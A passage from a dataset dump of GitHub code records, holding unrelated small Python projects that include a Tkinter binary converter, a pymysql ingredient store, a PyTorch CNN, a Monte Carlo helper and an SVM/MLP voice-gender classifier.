MKTrivia()\r\n\t\ttrivia.trivia_name = trivia_name\r\n\t\ttrivia.default_general_feedback = self.request.get('default_general_feedback')\r\n\t\ttrivia.default_correct_feedback = self.request.get('default_correct_feedback')\r\n\t\ttrivia.default_wrong_feedback = self.request.get('default_wrong_feedback')\r\n\t\ttrivia.put()\r\n\t\tvalues = { \r\n\t\t\t\t'trivia_code' : str(trivia.key().id())\r\n\t\t\t\t}\r\n\t\tself.render('added_trivia',template_values=values)\r\n\t\t\r\n\r\n\r\ndef main():\r\n application = webapp.WSGIApplication([('/admin/trivia/(\\d*?)/addQuestion', AddQuestionHandler),\r\n\t\t\t\t\t\t\t\t\t\t('/admin/trivia/add',AddTriviaHandler),\r\n\t\t\t\t\t\t\t\t\t\t('/admin/trivia/listQuestions',ListTriviaHandler)\r\n\t\t\t\t\t\t\t\t\t\t],\r\n debug=True)\r\n util.run_wsgi_app(application)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"lomefin/leonardoluartenet","sub_path":"modules/admin/trivia.py","file_name":"trivia.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"5757614781","text":"import tkinter as tk\r\n\r\n# Create the main window\r\nroot = tk.Tk()\r\n\r\n# Create a function to convert a string to binary\r\ndef to_binary(string):\r\n # Initialize an empty list to hold the binary values\r\n binary_values = []\r\n\r\n # Loop through each character in the string\r\n for char in string:\r\n # Convert the character to its ASCII value and convert that to binary\r\n binary_values.append(bin(ord(char)))\r\n\r\n # Join the binary values into a single string and return it\r\n return ' '.join(binary_values)\r\n\r\n# Create a text field to enter the plain text\r\ntext_field = tk.Entry(root)\r\ntext_field.pack()\r\n\r\n# Create a button that, when clicked, will convert the plain text to binary\r\nconvert_button = tk.Button(root, text=\"Convert to Binary\", command=lambda: print(to_binary(text_field.get())))\r\nconvert_button.pack()\r\n\r\n# Start the GUI event loop\r\nroot.mainloop()\r\n","repo_name":"jeffryhawchab/text_to_binary","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"22624146124","text":"import torch.nn as nn\n\n\nclass CnnModel(nn.Module):\n def __init__(self, input_size: int | tuple[int], kernel_size: int | tuple[int], padding_size: int, stride: int):\n super(CnnModel, self).__init__()\n\n firstOuputSize = (input_size + 2 * padding_size -\n kernel_size) / stride + 1\n\n print(\"1st Layer output Size: {}\".format(\n firstOuputSize))\n\n self.layer1 = nn.Sequential(\n nn.Conv2d(in_channels=input_size, out_channels=firstOuputSize,\n kernel_size=kernel_size, padding=padding_size, stride=stride),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=1),\n )\n\n secondOutputSize = (firstOuputSize + 2 *\n padding_size - kernel_size) / stride + 1\n\n print(\"2nd Layer output Size: {}\".format(\n secondOutputSize))\n\n self.layer2 = nn.Sequential(\n nn.Conv2d(in_channels=firstOuputSize,\n out_channels=secondOutputSize, kernel_size=kernel_size, padding=padding_size, stride=stride),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=1),\n )\n\n self.fc = nn.Sequential(\n nn.Flatten(secondOutputSize),\n nn.Linear(secondOutputSize),\n nn.Softmax()\n )\n\n def forward(self, x):\n out = self.layer1(x)\n\n print(\"First Layer Convolution Output Size: {}\".format(out.size))\n\n out2 = self.layer2(out)\n\n print(\"Second Layer Convolution Output Size: {}\".format(out2.size))\n\n out3 = self.fc(out2)\n\n return out3\n","repo_name":"donghquinn/mojo-practice","sub_path":"python_modules/cnn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"27504155828","text":"import pymysql\n\nconnection = pymysql.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"123456\",\n db=\"recipes_app\",\n charset=\"utf8\",\n cursorclass=pymysql.cursors.DictCursor\n)\n\nif connection.open:\n print(\"the connection is opened\")\n\n\ndef insert_dairy_ingredients(ingredients):\n try:\n values = []\n for ingredient in ingredients:\n values.append(f'(\"{ingredient.lower()}\")')\n with connection.cursor() as cursor:\n query = f\"INSERT ignore into dairy_ingredients(name) values{','.join(values)};\"\n cursor.execute(query)\n connection.commit()\n except:\n print(\"DB Error\")\n\n\ndef insert_gluten_ingredients(ingredients):\n try:\n values = []\n for ingredient in ingredients:\n values.append(f'(\"{ingredient.lower()}\")')\n with connection.cursor() as cursor:\n query = f\"INSERT ignore into gluten_ingredients(name) values{','.join(values)};\"\n cursor.execute(query)\n connection.commit()\n except:\n print(\"DB Error\")\n\n\ndef get_dairy_ingredients():\n try:\n with connection.cursor() as cursor:\n query = f\"SELECT * FROM dairy_ingredients;\"\n cursor.execute(query)\n results = cursor.fetchall()\n dairy_ingredients = []\n for res in results:\n dairy_ingredients.append(res[\"name\"])\n return (dairy_ingredients)\n except:\n print(\"DB Error\")\n\n\ndef get_gluten_ingredients():\n try:\n with connection.cursor() as cursor:\n query = f\"SELECT * FROM gluten_ingredients;\"\n cursor.execute(query)\n results = cursor.fetchall()\n gluten_ingredients = []\n for res in results:\n gluten_ingredients.append(res[\"name\"])\n return (gluten_ingredients)\n except:\n print(\"DB Error\")\n","repo_name":"Adi-Shuker/recipe_app","sub_path":"db_manager.py","file_name":"db_manager.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"20619291818","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import QCoreApplication\nfrom PyQt5.QtGui import QIcon\nimport sys\nimport qtawesome\nclass TopWidget(QtWidgets.QWidget):\n def __init__(self):\n super(TopWidget, self).__init__()\n\n self.setObjectName(\"TopWidget\")\n self.setStyleSheet('''\n QWidget#TopWidget{\n background:#40E0D0;\n border-top-left-radius:10px;\n border-top-right-radius:10px;\n border-top:1px solid white;\n border-right:1px solid darkGray;\n border-left:1px solid white;\n\n }\n ''')\n self.close_button = QtWidgets.QPushButton(self)\n self.close_button.setGeometry(QtCore.QRect(900, 20, 25, 25))\n self.close_button.setIcon(QIcon(\"icon//close.jpg\"))\n\n self.close_button.setStyleSheet(\"\"\"\n background:#ffffff;\n border-radius:10px;\n \"\"\")\n self.sign_pic = QtWidgets.QLabel(self)\n self.sign_pic.setGeometry(QtCore.QRect(15,15,30,30))\n self.sign_pic.setPixmap(QtGui.QPixmap.fromImage(QtGui.QImage(\"icon//window.png\")))\n self.sign_pic.setScaledContents(True)\ndef main():\n app = QtWidgets.QApplication(sys.argv)\n gui = TopWidget()\n gui.show()\n sys.exit(app.exec_())\nif __name__ == '__main__':\n main()\n","repo_name":"chenwenxin1998/nuclearfinder","sub_path":"nuclearfinder/TopWidget.py","file_name":"TopWidget.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"14431616621","text":"import socket\n\nsock = socket.socket()\n\nsock.connect(('localhost', 5075))\nwhile True:\n pnumber = input(\"type number (0 - 100):\")\n sock.send(bytes(pnumber + \"\\n\", \"utf-8\"))\n resp = sock.recv(8)\n print(resp.decode(\"utf-8\"))\n if(resp.decode(\"utf-8\") == \"correct\"):\n sock.close()\n exit(0)\n","repo_name":"TzeenchH/HighloadServices","sub_path":"Lab3/TCPClient.py","file_name":"TCPClient.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"71556018324","text":"from os import path\nfrom os.path import dirname, realpath, isfile\nfrom json import dump, load\n\n\nclass jsonManager():\n def __init__(self):\n self.path = dirname(realpath(__file__)) + \"/\"\n \n def create_json(self, file, dicionario):\n data = dicionario\n path_data_json = self.path + file\n\n if not isfile(path_data_json):\n with open(path_data_json, 'w') as f:\n dump(data, f, indent = 4, separators = (',', ':'))\n return True\n else:\n return False\n\n def update(self, file, dicionario):\n pass\n def read(self, file):\n self.arquivo = self.path + file\n print(self.arquivo)\n if isfile(self.arquivo):\n with open(self.path + file) as f:\n data = load(f)\n return data\n else:\n return False\n\n\"\"\"if __name__ == '__main__':\n jmaneger = jsonManager()\n dic = {\n \n }\n print(jmaneger.read(\"teste.json\"))\"\"\"\n","repo_name":"KaiqueAndeloci/projetoRPG","sub_path":"json_manager.py","file_name":"json_manager.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"28584855178","text":"from keras.models import Sequential\nfrom keras.layers.core import Dense, Activation, Dropout, Flatten\nfrom keras.layers.recurrent import LSTM\n\n\nclass LSTMModel:\n def __init__(self, timesteps, hidden_neurons):\n self.timesteps = timesteps\n self.hidden_neurons = hidden_neurons\n self.input_dim = 3\n\n def build(self):\n print(\"Building model...\")\n model = Sequential()\n\n model.add(LSTM(self.hidden_neurons,\n batch_input_shape=(None, self.timesteps, self.input_dim),\n return_sequences=True))\n # model.add(Dropout(0.2))\n print(model.output_shape) # => (None, 10, 10)\n\n # model.add(LSTM(100, return_sequences=False))\n model.add(Flatten())\n print(model.output_shape) # => (None, 100)\n\n model.add(Dense(1))\n print(model.output_shape) # => (None, 1)\n\n model.add(Activation(\"linear\"))\n print(model.output_shape) # => (None, 1)\n\n # model.compile(loss=\"mape\", optimizer=\"rmsprop\")\n model.compile(loss='mse', optimizer='rmsprop')\n\n model.summary()\n\n return model\n","repo_name":"takp/stock-price-predictor","sub_path":"lstm_model.py","file_name":"lstm_model.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"30"} +{"seq_id":"36405860706","text":"import os\nimport django\nimport requests\nimport random\nfrom datetime import datetime, timedelta\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"bike_store.settings\")\ndjango.setup()\n\nfrom rent.models import Customer, Vehicle, RentalStation\n\nBASE_URL = 'http://127.0.0.1:8000/api/rental/'\n\n\ndef create_rentals():\n customer_ids = list(Customer.objects.values_list('id', flat=True))\n vehicle_ids = list(Vehicle.objects.values_list('id', flat=True))\n rental_station_ids = list(RentalStation.objects.values_list('id', flat=True))\n\n rental_data = {\n \"return_date\": \"2023-08-20\",\n }\n\n for _ in range(200):\n rental_date = datetime(2023, 4, 1) + timedelta(days=random.randint(0, 137))\n rental_data[\"rental_date\"] = rental_date.strftime('%Y-%m-%d')\n\n rental_data[\"customer\"] = random.choice(customer_ids)\n rental_data[\"vehicle\"] = random.choice(vehicle_ids)\n rental_data[\"rental_station\"] = random.choice(rental_station_ids)\n\n if random.choice([True, False]):\n rental_data[\"return_date\"] = (rental_date + timedelta(days=random.randint(1, 365))).strftime('%Y-%m-%d')\n\n response = requests.post(BASE_URL, json=rental_data)\n\n if response.status_code == 201:\n print(f\"Rental created for customer {rental_data['customer']}\")\n else:\n print(f\"Failed to create rental for customer {rental_data['customer']}: {response.content}\")\n\n\nif __name__ == \"__main__\":\n create_rentals()\n","repo_name":"ItayMoshel/DI","sub_path":"Week6/Day5/Exercises/bike_store/create_rentals.py","file_name":"create_rentals.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"74580519443","text":"class Solution:\n def sortedListToBST(self, head):\n return self.dfs(head, None)\n\n def dfs(self, head, tail):\n if head == tail:\n return None\n slow, fast = head, head\n while fast != tail and fast.next != tail:\n fast = fast.next.next\n slow = slow.next\n root = TreeNode(slow.val)\n root.left = self.dfs(head, slow)\n root.right = self.dfs(slow.next, tail)\n return root\n","repo_name":"huangyingw/submissions","sub_path":"109/109.convert-sorted-list-to-binary-search-tree.234339825.Accepted.leetcode.py","file_name":"109.convert-sorted-list-to-binary-search-tree.234339825.Accepted.leetcode.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"16035830327","text":"from merge.framework.spreadsheet.section import Section\nfrom merge.framework.spreadsheet.cell import Cell\nfrom merge.spreadsheet.reconciliar.header_group import HeaderGroup\nfrom merge.spreadsheet.reconciliar.column_group import ColumnGroup\nfrom merge.spreadsheet.reconciliar.style import stylesheet\n\n\nWIDTHS = [\n 10, 35, 10\n]\nALIGN = [\n 0, 1, 2\n]\nTITLES = [\n 'Data', 'Nome', 'Valor'\n]\n\n\nclass ClientsSection(Section):\n def __init__(self, parent_sheet, inputs, clients):\n super().__init__(parent_sheet, inputs, 'clients', [0, 0], [0, 0])\n\n self.clients = clients\n\n self.add_row()\n self.add_group(HeaderGroup(self, 'Dados a Reconciliar', 'header', 1, 3))\n\n self.add_row()\n\n client_columns = list(zip(*clients))\n\n for j, column in enumerate(client_columns):\n group = ColumnGroup(\n self,\n inputs,\n column,\n {\n 'title': TITLES[j],\n 'column_width': WIDTHS[j]\n }\n )\n\n for i, row in enumerate(column):\n group.add_row()\n\n cell = Cell(\n self,\n inputs,\n f'{column}-{i}',\n {\n 'text': row\n },\n set([\n 'entry',\n ['center', 'left', 'right'][ALIGN[j]]\n ]),\n WIDTHS[j],\n stylesheet\n )\n group.add_cell(cell)\n\n self.add_group(group)\n","repo_name":"williamroque/Mega-Digest","sub_path":"merge/merge/spreadsheet/reconciliar/clients_section.py","file_name":"clients_section.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"72725459284","text":"import serial\nimport subprocess\nimport sys\nimport os\nimport time\nimport _thread\nlog = print\n\n\nclass Uploader(object):\n def __init__(self, ser, file):\n self.ser = ser\n self.file = file\n\n def load(self):\n s = serial.Serial(self.ser, baudrate=9600, timeout=1)\n # Set M2 baudrate to 19200\n s.write(b'1')\n time.sleep(0.1)\n s.write(b'1f800702\\n')\n time.sleep(0.1)\n s.write(b'1000\\n')\n time.sleep(0.2)\n\n # Set computer baudrate to 19200\n s.baudrate = 19200\n time.sleep(0.1)\n\n # Erase flash\n s.write(b'1')\n time.sleep(0.1)\n s.write(b'10300000\\n')\n time.sleep(0.1)\n s.write(b'1\\n')\n time.sleep(0.2)\n\n # Bootloader\n s.write(b'5')\n time.sleep(0.1)\n s.write(b'10000000\\n')\n time.sleep(0.2)\n with open(self.file, 'rb') as f:\n bin = f.read()\n s.write(bin)\n time.sleep(1)\n\n # Set baudrate to 9600\n s.write(b'1')\n time.sleep(0.1)\n s.write(b'1f800702\\n')\n time.sleep(0.1)\n s.write(b'0\\n')\n time.sleep(0.3)\n\n s.baudrate = 9600\n time.sleep(0.3)\n\n print('Upload completed.')\n\n\ndef main():\n if len(sys.argv) > 1:\n uploader = Uploader(ser=sys.argv[1],file=sys.argv[2])\n uploader.load()\n else:\n print(\"Usage: uploader [port] [bin_file_path]\\n\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"daizhirui/CamelLibrary","sub_path":"ToolChains/uploader.py","file_name":"uploader.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"30"} +{"seq_id":"21203384885","text":"import repertoire_action as action\nfrom terminaltables import AsciiTable\n\ndef afficher_tableau(repertoire):\n tableau = [[\"nom\", \"numeros\", \"adresse\"]]\n liste_contacts = (action.lister_contacts(repertoire))\n for contacts in liste_contacts:\n tableau.append([contacts[\"nom\"], contacts[\"telephone\"], contacts[\"adresse\"]])\n print(AsciiTable(tableau).table)\n\n\ndef afficher_tout_les_contacts(repertoire):\n afficher_tableau(repertoire)\n\n\ndef supprimer_personne():\n name = input(\"\\nquel contact voulez vous supprimer ?\")\n if action.supprimer_personne(repertoire, name):\n print(\"le contact a été supprimer\")\n afficher_tout_les_contacts(repertoire)\n else:\n print(\"Réessaye\")\n\n\ndef ajouter_personne():\n nom = input(\"\\nquel est le nom du contact ?\")\n telephone = input(\"quel est le numero ?\")\n adresse = input(\"quelle est l'adresse ?\")\n added = action.ajouter_personne(repertoire, nom, telephone, adresse)\n if added:\n print(\"\\nle contact à été ajouter\")\n afficher_tout_les_contacts(repertoire)\n else:\n print(\"le contact existe déja\")\n\ndef afficher_recherche(resultats_recherche):\n print(resultats_recherche)\n\n\n\n\ndef rechercher_personne():\n recherche = input(\"\\nveuillez entrer le nom du contact :\")\n resultats_recherche = action.recherche_personnes(repertoire, recherche)\n if resultats_recherche:\n afficher_recherche(resultats_recherche)\n else:\n print(\"aucun contact a ce nom\")\n\n\nwhile True:\n repertoire = action.get_rep()\n choix_utilisateur = input(\"\\nPress L pour lister , A pour ajouter et S pour supprimer un contact ou R pour \"\n \"rechercher un contact :\").upper()\n\n if choix_utilisateur == \"L\":\n print(\"\\nvoici les contacts\")\n afficher_tout_les_contacts(repertoire)\n\n elif choix_utilisateur == \"S\":\n supprimer_personne()\n\n elif choix_utilisateur == \"A\":\n ajouter_personne()\n\n elif choix_utilisateur == \"R\":\n rechercher_personne()\n\n elif choix_utilisateur ==\"Q\":\n break","repo_name":"legerM/repertoire","sub_path":"repertoire_ui.py","file_name":"repertoire_ui.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"18934052473","text":"\"\"\"General monte carlo simulation helper.\"\"\"\n\nimport os\nfrom time import time\nimport multiprocessing\nfrom collections import OrderedDict\n\nfrom pathos.multiprocessing import ProcessPool\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom mpmath import mpf\n\nglobal_fn_multi = None\nglobal_var_multi = None\n\n\ndef multiprocessing_func(fn_to_eval, random_var_gen, i):\n \"\"\"Allows monte carlo to run on multiple CPUs.\"\"\"\n random_vars = random_var_gen(i)\n result = fn_to_eval(*random_vars)\n return result\n\n\ndef monte_carlo(\n fn_to_eval,\n random_var_gen,\n num_simulations,\n num_cpus=1,\n save_every=1,\n save_name=\"monte_carlo_result.csv\",\n headers=None,\n progress=True,\n):\n \"\"\"\n Full monte carlo simulation loop.\n\n Evaluate fn_to_eval over num_simulations iterations, with\n *random_var_gen(i) passed into fn_to_eval at each iteration i.\n\n \"\"\"\n all_stats = []\n global_fn_multi = fn_to_eval\n global_var_multi = random_var_gen\n save_every = int(save_every * num_simulations)\n\n # temp = [random_var_gen() for _ in range(num_simulations)]\n # random_vars = [[] for _ in temp[0]]\n # for val in temp:\n # for i, item in enumerate(val):\n # random_vars[i].append(item)\n\n pbar = tqdm(range(num_simulations), disable=not progress)\n if num_cpus > 1:\n # pool = multiprocessing.get_context(\"spawn\").Pool(num_cpus)\n pool = ProcessPool(nodes=num_cpus)\n print(\n \"Launching {} workers for {} iterations\".format(num_cpus, num_simulations)\n )\n pbar.set_description(\"Monte carlo loop\")\n for i in pbar:\n result = pool.apipe(\n multiprocessing_func, global_fn_multi, global_var_multi, i\n )\n # result = pool.amap(fn_to_eval, random_vars)\n # result = pool.apply_async(\n # multiprocessing_func,\n # (i, global_fn_multi, global_var_multi))\n all_stats.append(result.get())\n\n else:\n pbar.set_description(\"Monte carlo loop\")\n for i in pbar:\n random_vars = random_var_gen(i)\n result = fn_to_eval(*random_vars)\n all_stats.append(result)\n\n if (i != 0) and (i % save_every == 0):\n parts = os.path.splitext(save_name)\n out_name = parts[0] + \"_\" + str(i) + parts[1]\n df = list_to_df(all_stats, headers)\n here = os.path.dirname(os.path.realpath(__file__))\n os.makedirs(os.path.join(here, \"..\", \"mc\"), exist_ok=True)\n print(\"Saving results at {} iterations to {}\".format(i, out_name))\n df.to_csv(os.path.join(here, \"..\", \"mc\", out_name), index=False)\n\n return all_stats\n\n\ndef list_to_df(in_list, headers=None):\n \"\"\"Convert a list to a dataframe with the given headers.\"\"\"\n if headers is None:\n headers = [\"V{}\".format(i) for i in range(len(in_list[0]))]\n results_df = pd.DataFrame.from_records(in_list, columns=headers)\n return results_df\n\n\ndef summarise_monte_carlo(\n df,\n txt_outfile=None,\n plot=True,\n to_plot=None,\n plt_outfile=None,\n do_print=False,\n):\n \"\"\"Summary stats of monte carlo with optional dist plot.\"\"\"\n result = df.describe().round(4)\n if (txt_outfile is None) and do_print:\n print(result)\n elif txt_outfile is not None:\n with open(txt_outfile, \"w\") as f:\n f.write(result)\n if plot:\n if to_plot is None:\n raise ValueError(\"Please provide a column to plot\")\n a = df[to_plot].to_numpy()\n is_unique = (a[0] == a).all()\n if not is_unique:\n sns.displot(\n df[to_plot],\n kde=True,\n rug=False,\n # kde_kws={\"color\": \"k\", \"lw\": 3, \"label\": \"KDE\"},\n # hist_kws={\"histtype\": \"step\", \"linewidth\": 3, \"alpha\": 1, \"color\": \"g\"},\n )\n if plt_outfile is None:\n plt.show()\n else:\n plt.savefig(plt_outfile, dpi=400)\n plt.close()\n return result\n\n\ndef get_distribution(result_df, column_name, num_iters):\n \"\"\"Calculate the simulated distribution of column_name.\"\"\"\n distrib = {}\n to_add = 1 / num_iters\n for val in result_df[column_name]:\n if val in distrib:\n distrib[val] += to_add\n else:\n distrib[val] = to_add\n\n ordered_dist = OrderedDict()\n keys = sorted(distrib.keys())\n for key in keys:\n ordered_dist[key] = distrib[key]\n\n return ordered_dist\n\n\ndef dist_difference(actual_distribution, expected_distribution):\n \"\"\"Calculate the difference between two distributions.\"\"\"\n difference = {}\n for k, v in expected_distribution.items():\n difference[k] = actual_distribution[k] - v\n return difference\n","repo_name":"seankmartin/NeuralConnections","sub_path":"Code/neuroconnect/monte_carlo.py","file_name":"monte_carlo.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"14558875231","text":"user_question = input(\"Напиши что-нибудь: \").lower()\n\ndef get_answer(question):\n answers={\n \"привет\":\"И тебе привет!\",\n \"как дела\":\"Лучше всех\", # в юпитере нет ошибки с этим ключом, в cmd есть\n \"пока\":\"Увидимся\"\n }\n return answers[question]\n\nprint(get_answer(user_question))","repo_name":"TGrigoryeva/Learn-Python","sub_path":"lesson1/getanswer.py","file_name":"getanswer.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"25559097608","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 20 17:30:25 2023\r\n\r\n@author: hp\r\n\"\"\"\r\na =[\"Kabir\",\"Meera\",\"Tulsidaas\",\"buddha\",\"Krishnamurti\"]\r\n\r\nfor name in a:\r\n if name.startswith(\"K\"):\r\n print(\"Namaste,\"+ name)","repo_name":"amitkumar824/python","sub_path":"nf6.py","file_name":"nf6.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"20092576366","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 11 08:29:52 2018\n\n@author: arden\n\"\"\"\n\nimport cv2\nimport numpy as np\n\n#use GUI for near perfect match detection\n\nimg_bgr = cv2.imread('../images/eyes/sample_1.jpg')\nimg_gray = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2GRAY)\n\ntemplate = cv2.imread('../images/eyes/template_1.jpg',0)\nw, h = template.shape[::-1]\n\nres = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)\nthreshold = 0.8\nloc = np.where(res > threshold)\n\nfor pt in zip(*loc[::-1]):\n cv2.rectangle(img_bgr, pt, (pt[0]+w, pt[1]+h), (0,255,255), 2)\n \ncv2.imshow('detected', img_bgr)\n","repo_name":"18381304961/concussionanalysis","sub_path":"tutorials/gradient/template_matching.py","file_name":"template_matching.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"39361374629","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport numbers\nimport time\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.metrics import roc_curve, auc\n\ndata = pd.read_csv('voice.csv')\n\n# Converts 'male' -> 1 and 'female' -> -1\ndata = data.replace(['male','female'],[1,-1])\nX = data.values[:,0:-1]\nY = data.values[:,-1]\n\n# Checks that all values in the data matrix are numbers\nfor i in range(X.shape[0]):\n for j in range(X.shape[1]):\n if(not isinstance(X[i,j], numbers.Number)):\n print(\"NAN @ %d %d\" % (i,j))\n\n# Splits the data into a training set and testing set\n# If not specified, testing is 25% of all the data\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, random_state=0)\n\n# Scale all training features to have a mean of zero and std dev of 1\n# Will only use the training data to determine how to scale the features\n# Testing data will have a mean of approx 0 and a std dev of approx 1\nscaler = StandardScaler().fit(X_train)\nnorm_X_train = scaler.transform(X_train)\nnorm_X_test = scaler.transform(X_test)\n\n# Ten-fold Cross Validation on the MLP Classifier (checking accuracy of model)\n# Only do cross validation on the training set, NOT THE TEST SET\nmlp = MLPClassifier(max_iter=500, random_state=0)\nprint(\"Starting MLP 10-fold cross validation...\")\nmlp_score = cross_val_score(mlp, norm_X_train, Y_train, cv=10, verbose=3, n_jobs=1)\nmlp_score = np.average(mlp_score)\nprint()\n\n# Create MLP Classifier object, with random_state = 0\nmlp = MLPClassifier(max_iter = 500, random_state=0)\nmlp.fit(norm_X_train,Y_train)\nmlp_Y_pred = mlp.predict(norm_X_test)\nmlp_metrics = precision_recall_fscore_support(mlp_Y_pred, Y_test)\nmlp_precision = np.average(mlp_metrics[0]) # First array is precision of each class\nmlp_recall = np.average(mlp_metrics[1]) # Second array is accuracy of each class\nmlp_f1 = 2 * (mlp_precision * mlp_recall) / (mlp_precision + mlp_recall)\n\n# Creates a ROC Curve for the MLP trained above\nclassifier = OneVsRestClassifier(MLPClassifier(max_iter = 500, random_state=0))\ny_score = classifier.fit(norm_X_train, Y_train).predict(norm_X_test)\nfpr, tpr, _ = roc_curve(Y_test, y_score)\nroc_auc_MLP = auc(fpr, tpr)\nplt.figure()\nlw = 2\nplt.plot(fpr, tpr, color='red', lw=lw)\nplt.xlim([0.0, 1.0])\nplt.ylim([0.0, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('ROC Curves for Different Models')\nplt.legend(loc=\"lower right\")\n\n# Ten-fold Cross Validation on the SVM Classifier (checking accuracy of model)\n# Only do cross validation on the training set, NOT THE TEST SET\nsvm = SVC(C = 2, kernel = 'rbf')\nprint(\"Starting SVM 10-fold cross validation...\")\nsvm_score = cross_val_score(svm, norm_X_train, Y_train, cv=10, verbose=3, n_jobs=1)\nsvm_score = np.average(svm_score)\nprint()\n\n# Create a SVM classifier with optimal parameters specified below\nsvm = SVC(C = 2, kernel = 'rbf')\nsvm.fit(norm_X_train,Y_train)\nsvm_Y_pred = svm.predict(norm_X_test)\nsvm_metrics = precision_recall_fscore_support(svm_Y_pred, Y_test)\nsvm_precision = np.average(svm_metrics[0]) # First array is precision of each class\nsvm_recall = np.average(svm_metrics[1]) # Second array is accuracy of each class\nsvm_f1 = 2 * (svm_precision * svm_recall) / (svm_precision + svm_recall)\n\n# Creates a ROC Curve for the SVM trained above\nclassifier = OneVsRestClassifier(SVC(C = 2, kernel = 'rbf'))\ny_score = classifier.fit(norm_X_train, Y_train).decision_function(norm_X_test)\nfpr, tpr, _ = roc_curve(Y_test, y_score)\nroc_auc_SVM = auc(fpr, tpr)\nplt.plot(fpr, tpr, color='navy', lw=lw)\nplt.plot([0, 1], [0, 1], color='black', lw=lw, linestyle='--')\nplt.xlim([0.0, 1.0])\nplt.ylim([0.0, 1.05])\nplt.legend(['ROC Curve for MLP (area = %0.3f)' % roc_auc_MLP,\n 'ROC Curve for SVM (area = %0.3f)' % roc_auc_SVM,\n 'Standard Curve'],loc=\"lower right\")\n\n# Output the metrics of the models\nprint(\"Neural Network Model Test Set Metrics:\")\nprint(\"\\tCross Val Acc:\\t%f\" % mlp_score)\nprint(\"\\tAccuracy:\\t%f\" % mlp.score(norm_X_test, Y_test))\nprint(\"\\tPrecision:\\t%f\" % mlp_precision)\nprint(\"\\tRecall:\\t\\t%f\" % mlp_recall)\nprint(\"\\tF1:\\t\\t%f\" % mlp_f1)\nprint(\"\")\nprint(\"Support Vector Machine Model Test Set Metrics:\")\nprint(\"\\tCross Val Acc:\\t%f\" % svm_score)\nprint(\"\\tAccuracy:\\t%f\" % svm.score(norm_X_test, Y_test))\nprint(\"\\tPrecision:\\t%f\" % svm_precision)\nprint(\"\\tRecall:\\t\\t%f\" % svm_recall)\nprint(\"\\tF1:\\t\\t%f\" % svm_f1)\n\n# Shows the ROC Curve plots that were made earlier\nplt.show()\n\n################################################################################\n# Used to find the optimal parameters for the Neural Network model\n# max_iter = 80 and random_state = 0\n################################################################################\n# mlp = MLPClassifier(random_state=0)\n# alphas = 10.0 ** -np.arange(1,7)\n# iterations = np.arange(20,2000,20)\n# params = {'alpha':alphas, 'max_iter':iterations}\n# clf = GridSearchCV(mlp, params)\n# clf.fit(norm_X_train,Y_train)\n# print(clf.best_params_)\n\n################################################################################\n# Used to visualize how accuracy changed with max_iter for Neural Network model\n################################################################################\n# train_scores = []\n# test_scores = []\n# for i in np.arange(70,90,1):\n# 